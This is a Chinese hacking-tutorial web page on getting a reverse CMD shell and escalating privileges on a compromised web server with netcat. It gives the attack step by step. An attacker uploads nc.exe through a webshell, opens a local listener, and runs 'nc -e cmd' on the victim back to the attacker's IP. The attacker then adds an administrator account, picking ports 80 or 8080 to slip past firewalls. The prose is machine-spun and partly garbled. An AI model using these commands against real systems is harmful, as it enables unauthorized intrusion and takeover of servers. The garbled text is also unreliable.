IT学习网 - 爱学习 - 最具影响力综合资讯网站 -- 中国IT界的领航者!
热门关键字:      88888  as  xxx
站外
广告
站外
广告

NC反弹CMDSHELL提权总结

发布时间:2015-08-18 12:15文章来源:网络文章作者: 爱学习点击次数:
IT学习网是国内以普及黑客攻防的学习技术资料网站,本站历经长期发展已深得广大黑客技术爱好者的好评和喜爱,为您提供从基础到高端的信息技术学习平台,我们也努力将IT学习网做的更好!

 Server-U等都不行以用的环境下.   一样平常都可思索用此要领 

不外这种要领, 只要对方装了, 或是屏障掉了除常用的那几个端口外的全部端口…   那么这种要领也失效了….

1:通过shell将上传NC和CMD传到站点目次下(这里必然上传的留意权限,最好是可读写目次下) 
web目次都是有写有读的权限,我们直接传NC进去

2:然后当地执行nc -vv -lp 52举办反弹

3:在shell呼吁下执行 
F:\wwwroot\img\nc.exe  -e cmd上传路径  IP(外网IP)  52(这里是本机端口)

4:在shell里执行呼吁后,顿时看到当地CMS里已经反弹上去了,执行net user 也是乐成.

5:直接添加用户,然后长途去毗连!

看到添加乐成,也配置为打点组了!接下来直接长途毗连就OK!

不少人NC提权没有乐成过,由于个中的缘故起因是你没有低落权限,而导致了NC提权失败

失败总结:

1.反弹端口

网上不少文章写 反弹端口445 110 什么的,你当呆子是不是,我提议看一下端口有没有8080端口,假如没有8080端口的话,要反弹8080 
端口,这样被阻止的概率较小

2.低落运行权限

1.此刻当地监听一个端口

nc -vv -l -p 8080 //最好是80或8080这样的端口,被拦截的几率很小。

2.在WebShell运行下面呼吁毗连我们监听的端口获得CmdShell:

nc -vv IP 8080 -e C:\Documents and Settings\All Users\Documents\cmd.exe //假设cmd.exe是上传在"C:\Documents and Settings\All 
Users\Documents\"这个目次


NC反弹CMDSHELL提权总结
本文由 IT学习网 整理,转载请注明“转自IT学习网”,并附上链接。
原文链接:http://www.ourlove520.com/Article/netsafe/xitong/18990.html

标签分类:

hack
上一篇:上一篇:怎样发明Facebook处事器中的长途代码执行裂痕
下一篇: 下一篇:OASISWeb处事安详之安详令牌
无觅关联推荐,快速提升流量